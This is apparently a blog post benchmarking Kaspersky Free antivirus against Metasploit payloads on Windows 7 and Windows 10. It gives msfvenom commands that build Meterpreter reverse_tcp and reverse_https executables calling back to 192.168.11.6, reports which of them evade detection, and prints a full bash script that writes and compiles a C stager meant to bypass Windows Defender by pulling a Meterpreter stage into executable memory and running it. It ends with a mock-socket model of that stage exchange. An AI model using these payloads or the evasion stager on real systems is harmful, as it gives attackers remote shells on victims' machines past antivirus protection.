Kaspersky Free Antivirus for Windows vs. Metasploit

Kaspersky has finally released a free version (not a trial) of its antivirus for the Windows platform. As they say, in return it uses the data you contribute to improve machine learning across their products.

So let's check how this product handles various Metasploit payloads and encoders. I ran two sets of tests, one on a fully patched Windows 7 SP1 x64 (ver. 6.1.7601) and one on Windows 10 x64 (build 10586).

Test 1) Windows 7 SP1 x64 (ver. 6.1.7601)

Let's prepare a set of executable payloads first.

32-bit tests (the second variant of each pair uses -b '\x00' to exclude the null byte, which makes msfvenom pick an encoder)
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 -f exe > 01.reverse_tcp.exe
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_tcp.exe
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.11.6 LPORT=443 -f exe > 01.reverse_https.exe
./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https.exe

64-bit tests
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 -f exe > 01.reverse_tcp64.exe
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_tcp64.exe
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.11.6 LPORT=443 -f exe > 01.reverse_https64.exe
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https64.exe

Java test
./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 -f jar > test.jar

Then put these binaries on an SMB share so we can use them later from the VMs.

Once we have Kaspersky Free installed and configured (https://www.kaspersky.com/free-antivirus),

we can start the actual tests. It performs fine and picks up most of the msfvenom-generated Meterpreter executables.

However, it fails on this one:

./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https64.exe

As the video demo shows, we get a Meterpreter shell quite easily from a stock msfvenom executable (no hackery involved).

 

Test 2) Windows 10 x64 (build 10586)

Here Kaspersky Free failed badly. It looks like the built-in Windows Defender still protects the system (and does a better job of detecting the msfvenom binaries generated above). For some reason the Kaspersky engine only picked up the JAR Meterpreter payload, while Windows Defender took care of the rest of the executables. Maybe it's because I used this old Windows 10 build (10586); I'm not sure, but it definitely does not work well on this platform.

You can see the output in this short video.

So I had to use a custom executable payload generator to bypass Windows Defender instead :) The script below writes a small C stager (based on rsmudge's metasploit-loader) and cross-compiles it with mingw-w64. Note that it is a stager, not a drop-in for the msfvenom executables above: it connects back, reads a 4-byte length and then the stage, and jumps into it, so the listener has to be a multi/handler for the staged x86 windows/meterpreter/reverse_tcp payload.

#!/bin/bash
# Generates a small C stager (based on rsmudge's metasploit-loader) that connects
# back to a multi/handler for the staged x86 windows/meterpreter/reverse_tcp
# payload, reads the stage and executes it, then cross-compiles it with mingw-w64.
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read -r ip
echo -en 'Metasploit port number : '
read -r port

# Write the C source. The host and port go in as string literals; the rest is a
# quoted heredoc, so no shell expansion touches the C code (\n, %s, etc. survive).
{
printf '#define SERVER_IP   "%s"\n' "$ip"
printf '#define SERVER_PORT "%s"\n' "$port"
cat <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>

static void winsock_init(void) {
    WSADATA wsaData;
    /* WSAStartup returns 0 on success and a positive error code otherwise (never < 0) */
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("bad\n");
        WSACleanup();
        exit(1);
    }
}

static void punt(SOCKET my_socket, const char *error) {
    printf("r %s\n", error);
    closesocket(my_socket);
    WSACleanup();
    exit(1);
}

/* Read exactly len bytes: TCP may deliver the stage in many short pieces. */
static int recv_all(SOCKET my_socket, void *buffer, int len) {
    int tret = 0;
    char *startb = (char *)buffer;
    while (tret < len) {
        int nret = recv(my_socket, startb + tret, len - tret, 0);
        /* check before advancing: SOCKET_ERROR is -1, and 0 means the peer closed */
        if (nret <= 0)
            punt(my_socket, "no data");
        tret += nret;
    }
    return tret;
}

static SOCKET wsconnect(const char *targetip, int port) {
    struct hostent *target;
    struct sockaddr_in sock;
    SOCKET my_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (my_socket == INVALID_SOCKET)
        punt(my_socket, ".");
    target = gethostbyname(targetip);
    if (target == NULL)
        punt(my_socket, "..");
    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((u_short)port);
    if (connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)))
        punt(my_socket, "...");
    return my_socket;
}

int main(int argc, char *argv[]) {
    ULONG32 size;
    char *buffer;
    void (*function)(void);
    (void)argc; (void)argv;

    FreeConsole();
    Sleep(10);
    winsock_init();
    SOCKET my_socket = wsconnect(SERVER_IP, atoi(SERVER_PORT));

    /* the handler first sends the stage length as a 4-byte little-endian integer */
    int count = recv(my_socket, (char *)&size, 4, 0);
    if (count != 4 || size == 0)
        punt(my_socket, "error length\n");

    /* 5 extra bytes for the prologue BF <sock32> == mov edi, <socket>: the x86
       Meterpreter stage expects its socket handle in EDI when it starts */
    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "error in buf\n");
    buffer[0] = (char)0xBF;
    memcpy(buffer + 1, &my_socket, 4);
    count = recv_all(my_socket, buffer + 5, size);
    function = (void (*)(void))buffer;
    function();
    return 0;
}
EOF
} > temp.c

echo '(+) Compiling binary ..'
i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows
ls -la temp.c
# use the cross toolchain's strip, the host strip may not understand PE
i686-w64-mingw32-strip payload.exe
file=$(ls -la payload.exe) ; echo '(+)' "$file"
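The part of that stager that is easiest to get wrong is the wire exchange itself, so here is an added example, written for this post and not part of rsmudge's loader or the script above, that models the client side in portable C: a 4-byte little-endian length, the stage bytes read with a loop that survives short reads and stops on close or error, and the 5-byte `mov edi, <socket>` prologue the x86 Meterpreter stage expects in front of it. The socket is replaced by a mock byte source and the stage by constructed bytes (not real Meterpreter), so it runs offline; `0x114` is an arbitrary stand-in for a socket handle, and nothing is executed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Byte source: returns bytes copied (>0), 0 at end of stream, -1 on error.
   In the real stager this is recv() on the socket; here a mock feeds
   constructed bytes so the exchange can be exercised without a listener. */
typedef int (*read_fn)(void *ctx, uint8_t *buf, size_t len);

/* Read exactly len bytes. Returns 1 on success, 0 if the stream ends or
   errors first. The result is checked before the offset is advanced, so a
   -1 never moves the cursor backwards and a 0 (peer closed) cannot spin. */
int read_exact(read_fn rd, void *ctx, uint8_t *buf, size_t len) {
    size_t got = 0;
    while (got < len) {
        int n = rd(ctx, buf + got, len - got);
        if (n <= 0)
            return 0;
        got += (size_t)n;
    }
    return 1;
}

/* The handler announces the stage with a 4-byte little-endian length. */
uint32_t parse_stage_length(const uint8_t hdr[4]) {
    return (uint32_t)hdr[0] | ((uint32_t)hdr[1] << 8) |
           ((uint32_t)hdr[2] << 16) | ((uint32_t)hdr[3] << 24);
}

/* Lay out the executable buffer: BF <imm32> is "mov edi, imm32", so the x86
   stage finds the connected socket handle in EDI, then the stage bytes.
   Returns stage_len + 5, or 0 if the output buffer is too small. */
size_t build_stage_buffer(uint32_t sock, const uint8_t *stage, size_t stage_len,
                          uint8_t *out, size_t cap) {
    if (cap < stage_len + 5)
        return 0;
    out[0] = 0xBF;
    out[1] = (uint8_t)(sock & 0xFF);
    out[2] = (uint8_t)((sock >> 8) & 0xFF);
    out[3] = (uint8_t)((sock >> 16) & 0xFF);
    out[4] = (uint8_t)((sock >> 24) & 0xFF);
    memcpy(out + 5, stage, stage_len);
    return stage_len + 5;
}

/* Client side of the exchange: length, then stage, then prologue+stage.
   Returns the total size, or 0 on any failure (short stream, bad length). */
size_t receive_stage(read_fn rd, void *ctx, uint32_t sock, uint8_t *out, size_t cap) {
    uint8_t hdr[4];
    if (!read_exact(rd, ctx, hdr, 4))
        return 0;
    uint32_t len = parse_stage_length(hdr);
    if (cap < 5 || len == 0 || len > cap - 5)
        return 0;
    uint8_t *stage = malloc(len);
    if (stage == NULL)
        return 0;
    if (!read_exact(rd, ctx, stage, len)) {
        free(stage);
        return 0;
    }
    size_t total = build_stage_buffer(sock, stage, len, out, cap);
    free(stage);
    return total;
}

/* Mock socket: hands out the wire bytes in chunks of at most `chunk` bytes
   so short reads are exercised; returns 0 once the data is exhausted. */
typedef struct { const uint8_t *data; size_t len, pos, chunk; } mock_src;

int mock_read(void *ctx, uint8_t *buf, size_t len) {
    mock_src *m = (mock_src *)ctx;
    if (m->pos >= m->len)
        return 0;
    size_t n = m->len - m->pos;
    if (n > m->chunk) n = m->chunk;
    if (n > len) n = len;
    memcpy(buf, m->data + m->pos, n);
    m->pos += n;
    return (int)n;
}

/* Constructed wire data (not real Meterpreter bytes): length 7, then 7 bytes. */
const uint8_t WIRE_OK[]    = { 0x07, 0x00, 0x00, 0x00, 'S', 'T', 'A', 'G', 'E', '!', '!' };
/* Same header, but the peer closes after only 2 bytes of stage. */
const uint8_t WIRE_SHORT[] = { 0x07, 0x00, 0x00, 0x00, 'S', 'T' };

/* Run one exchange against a constructed wire buffer. */
size_t demo_receive(const uint8_t *wire, size_t wire_len, size_t chunk,
                    uint32_t sock, uint8_t *out, size_t cap) {
    mock_src src = { wire, wire_len, 0, chunk };
    return receive_stage(mock_read, &src, sock, out, cap);
}

int main(void) {
    uint8_t out[64];
    /* 0x114 stands in for a socket handle; chunk size 3 forces partial reads */
    size_t total = demo_receive(WIRE_OK, sizeof WIRE_OK, 3, 0x114u, out, sizeof out);
    printf("full exchange: %zu bytes, prologue:", total);
    for (size_t i = 0; i < 5 && i < total; i++)
        printf(" %02X", out[i]);
    printf("\n");
    printf("truncated stream: %zu (0 = rejected)\n",
           demo_receive(WIRE_SHORT, sizeof WIRE_SHORT, 3, 0x114u, out, sizeof out));
    return 0;
}
```

The first five bytes of the result are `BF 14 01 00 00`, which is exactly what the stager's `buffer[0] = 0xBF; memcpy(buffer + 1, &my_socket, 4)` produces for a socket handle of 0x114 on a 32-bit build; the truncated stream and the too-small output buffer both come back as 0 instead of a half-filled buffer being jumped into.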

 

 
